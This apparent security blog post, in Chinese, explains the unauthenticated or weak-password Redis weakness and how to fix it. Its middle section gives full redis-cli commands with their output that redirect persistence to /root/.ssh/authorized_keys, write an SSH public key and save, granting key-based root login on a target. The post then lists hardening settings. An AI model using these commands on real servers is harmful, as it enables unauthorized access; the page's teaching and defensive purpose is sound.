

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/hd.png">
  <link rel="icon" href="/img/hd.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="10000hours">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言Redis 是一个开源的使用 ANSI C 语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库，并提供多种语言的 API。 当redis配置设置不当，可能会存在数据泄露、服务器入侵等安全风险 漏洞成因当redis服务存在未授权（没有设置密码+没有限制访问IP）或弱口令时，存在被利用 redis 的持久化功能和 config 命令（">
<meta property="og:type" content="article">
<meta property="og:title" content="redis_unauth">
<meta property="og:url" content="https://10000hours6.github.io/2024/03/15/security/secvulns/redis/redis_unauth/index.html">
<meta property="og:site_name" content="10000hours">
<meta property="og:description" content="前言Redis 是一个开源的使用 ANSI C 语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库，并提供多种语言的 API。 当redis配置设置不当，可能会存在数据泄露、服务器入侵等安全风险 漏洞成因当redis服务存在未授权（没有设置密码+没有限制访问IP）或弱口令时，存在被利用 redis 的持久化功能和 config 命令（">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-03-14T16:00:00.000Z">
<meta property="article:modified_time" content="2024-04-17T12:26:39.809Z">
<meta property="article:author" content="10000hours">
<meta property="article:tag" content="security">
<meta property="article:tag" content="secvulns">
<meta property="article:tag" content="unauth">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>redis_unauth - 10000hours</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"10000hours6.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>10000hours</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/hd.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="redis_unauth"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-03-15 00:00" pubdate>
          2024年3月15日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          10 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">redis_unauth</h1>
            
              <p id="updated-time" class="note note-info" style="display: none">
                
                  
                    本文最后更新于 2024-04-17T20:26:39+08:00
                  
                  

                
              </p>
            
            
              <div class="markdown-body">
                
                <span id="more"></span>

<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>Redis 是一个开源的使用 ANSI C 语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库，并提供多种语言的 API。</p>
<p>当redis配置设置不当，可能会存在数据泄露、服务器入侵等安全风险</p>
<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p>当redis服务存在未授权（没有设置密码+没有限制访问IP）或弱口令时，存在被利用 redis 的持久化功能和 config 命令（config 命令可设置持久化信息）的安全风险</p>
<p>redis 有两种持久化的方式：</p>
<p>1）快照模式（默认方式）RDB</p>
<p>快照模式是将内存中的数据以快照的方式写入问文件，默认文件名是 dump.rdb</p>
<p>默认配置：<br>save 900 1 # 900 秒内 1 个 key 改变就会持久化</p>
<p>save 300 10</p>
<p>save 60 10000</p>
<p>dbfilename dump.rdb # 持久化的文件名（不可存在路径，只能是文件名）</p>
<p>dir .&#x2F; # 持久化文件所在目录，可以设置绝对路径</p>
<p>缺陷：</p>
<p>意外宕机之后，会丢失上次快照到宕机时这段时间的数据</p>
<p>2）AOF 方式</p>
<p>redis 将每一个写命令都通过 write 函数追加到文件中（默认是 appendonly.aof）,当 redis 重启时会通过重新执行文件中保存的写命令来在内存中重建整个数据库的内容</p>
<p>配置：<br>appendonly yes# 启用日志追加持久化方式</p>
<p>#appendfsync always #每次收到写命令就立即强制写入磁盘，最慢，但是保证完全的持久化 不推荐使用<br># appendfsync everysec # 每秒强制写入磁盘一次，在性能和持久化方面做了很好的折中，推荐使用<br># appendfsync no #完全依赖操作系统，性能最好，持久化没有保证</p>
<h2 id="风险"><a href="#风险" class="headerlink" title="风险"></a>风险</h2><h3 id="数据泄露风险"><a href="#数据泄露风险" class="headerlink" title="数据泄露风险"></a>数据泄露风险</h3><p>redis服务没有访问授权限制，任意用户可登录，造成服务中存储的数据被任意用户获取，造成数据泄露</p>
<h3 id="服务器入侵风险"><a href="#服务器入侵风险" class="headerlink" title="服务器入侵风险"></a>服务器入侵风险</h3><p>redis服务没有访问授权限制，且在服务中可以修改服务配置，例如修改持久化配置，造成恶意用户登录服务，修改配置实现入侵</p>
<h2 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h2><h3 id="未授权-弱口令访问"><a href="#未授权-弱口令访问" class="headerlink" title="未授权&#x2F;弱口令访问"></a>未授权&#x2F;弱口令访问</h3><h4 id="构建SSH免登录"><a href="#构建SSH免登录" class="headerlink" title="构建SSH免登录"></a>构建SSH免登录</h4><h5 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h5><p>攻击主机用户的ssh公钥(～&#x2F;.ssh&#x2F;id_rsa.pub)写入目标主机的免登录配置文件authorized_keys中。</p>
<p>写入任意key的value值为ssh公钥内容，将该数据持久化到指定存在的目录&#x2F;user&#x2F;.ssh中的指定authorized_keys文件中。</p>
<h5 id="前提条件"><a href="#前提条件" class="headerlink" title="前提条件"></a>前提条件</h5><p>1、redis服务可未授权访问或弱口令访问</p>
<p>2、可以使用config命令修改持久化配置</p>
<p>3、ssh 支持使用 key 的方式进行认证登录</p>
<p>#RSAAuthentication yes</p>
<p>#PubkeyAuthentication yes</p>
<p>AuthorizedKeysFile     .ssh&#x2F;authorized_keys</p>
<h5 id="操作步骤"><a href="#操作步骤" class="headerlink" title="操作步骤"></a>操作步骤</h5><p>1、获取持久化目录及文件</p>
<p>config get dir</p>
<p>config get dbfilename</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">10</span>.<span class="hljs-number">222</span>.<span class="hljs-number">28</span>.<span class="hljs-number">37</span>:<span class="hljs-number">6379</span>&gt; config get dir<br><span class="hljs-attribute">1</span>) <span class="hljs-string">&quot;dir&quot;</span><br><span class="hljs-attribute">2</span>) <span class="hljs-string">&quot;/var/lib/redis&quot;</span><br><span class="hljs-attribute">10</span>.<span class="hljs-number">222</span>.<span class="hljs-number">28</span>.<span class="hljs-number">37</span>:<span class="hljs-number">6379</span>&gt; config get dbfilename<br><span class="hljs-attribute">1</span>) <span class="hljs-string">&quot;dbfilename&quot;</span><br><span class="hljs-attribute">2</span>) <span class="hljs-string">&quot;dump.rdb&quot;</span><br></code></pre></td></tr></table></figure>

<p>2、设置持久化目录和文件为指定目录文件</p>
<p>config set dir &#x2F;root&#x2F;.ssh</p>
<p>config set dbfilename authorized_keys</p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">10.222.28.37:6379</span>&gt; config set dir /root/.ssh<br>OK<br><span class="hljs-number">10.222.28.37:6379</span>&gt; config set dbfilename authorized_keys<br>OK<br><br><span class="hljs-number">10.222.28.37:6379</span>&gt; config get dir<br><span class="hljs-number">1</span>) <span class="hljs-string">&quot;dir&quot;</span><br><span class="hljs-number">2</span>) <span class="hljs-string">&quot;/root/.ssh&quot;</span><br><span class="hljs-number">10.222.28.37:6379</span>&gt; config get dbfilename<br><span class="hljs-number">1</span>) <span class="hljs-string">&quot;dbfilename&quot;</span><br><span class="hljs-number">2</span>) <span class="hljs-string">&quot;authorized_keys&quot;</span><br></code></pre></td></tr></table></figure>

<p>3、公钥写入并持久化</p>
<p>公钥信息</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">➜  ~ <span class="hljs-built_in">cat</span> ~/.ssh/id_rsa.pub <br>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDlzXhaC00n27yfFRNqT2Be+HN+bbzGScxkVlrrL3/TOm57YokSlozrJbil5XXGVGmX8AIM2kcvVLQWHq6bwmu03ew1MQHF/0a//tEP0jCEPARpD28PpnCe92pqBqde+ehlrS9SnFdNZspqmPVjLV4KiEWpL4opwhzDG6GtSA2YQy8Mv4yBH3FETcI4YSireliynZfwTfz6fpDPIQxEnH7cl0u2zMez209hfwIxRGR8e1XSaMlIdl2sntzEriXtOrqjjQ8pSKJp8+HK2S4VzTo5LZEFTqDn29wp5bJYFifFxTqayw2FLPtT0lBQV2ZeQFY9qasvmLEEOUYlDw2b2Scs2hwdvauSRuo+Dyfsws9JdpvVE5s2+pFLv24QaB+fCWGH4UmSUDXWdkA4YYpUME8sCdhLZRQEo5lnlbS/qaRDG4KU+egexR1o7QsigA5a06T73SYnYzGzao2ys1ww9jZgJsWr4w4t3NvGqTQJC4hjAbHr0BvVW+29C/38FGEL+/5bUFUVuJYELYQIM+EDeZR6rBtOmNKm7PgK8DDebdA63e26bGOsfjHmUC10qQaaSM7Tv5SvTIOEQxJfpyqQG9utObRTKTnXT8D4doYfaHth+pot69UbmlspEfwBdw6dK+CUkk6P4fTcrWGwIIZoPO5NPPY1hnpOvCDuUzCqgPLomQ== admin@110.<span class="hljs-built_in">local</span><br></code></pre></td></tr></table></figure>

<p>设置key   set xxx “\n\n\n用户公钥\n\n\n”</p>
<p>持久化  save</p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">10.222.28.37:6379</span>&gt; set xxx <span class="hljs-string">&quot;\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDlzXhaC00n27yfFRNqT2Be+HN+bbzGScxkVlrrL3/TOm57YokSlozrJbil5XXGVGmX8AIM2kcvVLQWHq6bwmu03ew1MQHF/0a//tEP0jCEPARpD28PpnCe92pqBqde+ehlrS9SnFdNZspqmPVjLV4KiEWpL4opwhzDG6GtSA2YQy8Mv4yBH3FETcI4YSireliynZfwTfz6fpDPIQxEnH7cl0u2zMez209hfwIxRGR8e1XSaMlIdl2sntzEriXtOrqjjQ8pSKJp8+HK2S4VzTo5LZEFTqDn29wp5bJYFifFxTqayw2FLPtT0lBQV2ZeQFY9qasvmLEEOUYlDw2b2Scs2hwdvauSRuo+Dyfsws9JdpvVE5s2+pFLv24QaB+fCWGH4UmSUDXWdkA4YYpUME8sCdhLZRQEo5lnlbS/qaRDG4KU+egexR1o7QsigA5a06T73SYnYzGzao2ys1ww9jZgJsWr4w4t3NvGqTQJC4hjAbHr0BvVW+29C/38FGEL+/5bUFUVuJYELYQIM+EDeZR6rBtOmNKm7PgK8DDebdA63e26bGOsfjHmUC10qQaaSM7Tv5SvTIOEQxJfpyqQG9utObRTKTnXT8D4doYfaHth+pot69UbmlspEfwBdw6dK+CUkk6P4fTcrWGwIIZoPO5NPPY1hnpOvCDuUzCqgPLomQ== admin@110.local\n\n\n&quot;</span><br>OK<br><span class="hljs-number">10.222.28.37:6379</span>&gt; save<br>OK<br><br></code></pre></td></tr></table></figure>



<h4 id="解决方案"><a href="#解决方案" class="headerlink" title="解决方案"></a>解决方案</h4><p>1、设置强口令</p>
<p>强口令规则：包含大小写子母、数字和特殊字符，长度在10位以上</p>
<p>redis.conf中配置</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">requirepass foobared</span><br></code></pre></td></tr></table></figure>

<p>2、开启protected-mode，限制本地登录</p>
<p>redis.conf中配置</p>
<figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs actionscript"><span class="hljs-keyword">protected</span>-mode yes<br></code></pre></td></tr></table></figure>

<p>3、监听本地</p>
<p>redis.conf中配置</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">bind</span> <span class="hljs-number">127.0.0.1</span><br></code></pre></td></tr></table></figure>

<p>4、禁用&#x2F;重命名危险命令（需重启服务）</p>
<p>常见危险命令：</p>
<p>flushall   清除所有数据</p>
<p>flushdb  清除当前db</p>
<p>keys *  获取所有key</p>
<p>config   客户端设置服务端命令</p>
<p>禁用危险命令：</p>
<p>配置文件中增加 rename-command commandname “” 配置</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs vim"><span class="hljs-built_in">rename</span>-<span class="hljs-keyword">command</span> flushall <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-built_in">rename</span>-<span class="hljs-keyword">command</span> flushdb <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-built_in">rename</span>-<span class="hljs-keyword">command</span> <span class="hljs-built_in">keys</span> <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-built_in">rename</span>-<span class="hljs-keyword">command</span> config <span class="hljs-string">&quot;&quot;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">127.0.0.1:6379</span>&gt; flushall<br>(error) ERR unknown command &#x27;flushall&#x27;<br><span class="hljs-number">127.0.0.1:6379</span>&gt; flushdb<br>(error) ERR unknown command &#x27;flushdb&#x27;<br><span class="hljs-number">127.0.0.1:6379</span>&gt; keys *<br>(error) ERR unknown command &#x27;keys&#x27;<br><span class="hljs-number">127.0.0.1:6379</span>&gt; config get dir<br>(error) ERR unknown command &#x27;config&#x27;<br></code></pre></td></tr></table></figure>

<p>重命名危险命令：</p>
<p>配置文件中增加 rename-command oldname newname 配置</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver"><span class="hljs-built_in">rename</span>-<span class="hljs-keyword">command</span> <span class="hljs-title">flushall</span> <span class="hljs-title">deleteall</span><br><span class="hljs-built_in">rename</span>-<span class="hljs-keyword">command</span> <span class="hljs-title">flushdb</span> <span class="hljs-title">deleteall</span><br></code></pre></td></tr></table></figure>

<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">127.0.0.1:6379</span>&gt; flushall<br>(error) ERR unknown command &#x27;flushall&#x27;<br><span class="hljs-number">127.0.0.1:6379</span>&gt; deleteall<br>OK<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/security/" class="category-chain-item">security</a>
  
  
    <span>></span>
    
  <a href="/categories/security/secvulns/" class="category-chain-item">secvulns</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/security/" class="print-no-link">#security</a>
      
        <a href="/tags/secvulns/" class="print-no-link">#secvulns</a>
      
        <a href="/tags/unauth/" class="print-no-link">#unauth</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>redis_unauth</div>
      <div>https://10000hours6.github.io/2024/03/15/security/secvulns/redis/redis_unauth/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>10000hours</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年3月15日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              BY 10000HOURS
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/03/15/yunwei/applications/git/git_sec/" title="git_sec">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">git_sec</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/14/security/secvulns/solr/solr_keys/" title="sorl_keys">
                        <span class="hidden-mobile">sorl_keys</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  var relativeDate = function() {
    var updatedTime = document.getElementById('updated-time');
    if (updatedTime) {
      var text = updatedTime.textContent;
      var reg = /\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:Z|[+-]\d{2}:\d{2})/;
      var matchs = text.match(reg);
      if (matchs) {
        var relativeTime = moment(matchs[0]).fromNow();
        updatedTime.textContent = text.replace(reg, relativeTime);
      }
      updatedTime.style.display = '';
    }
  };
  Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/moment.min.js', function() {
    if (!'zh-cn'.startsWith('en')) {
      Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/locale/zh-cn.min.js', function() {
        relativeDate();
      });
    } else {
      relativeDate();
    }
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
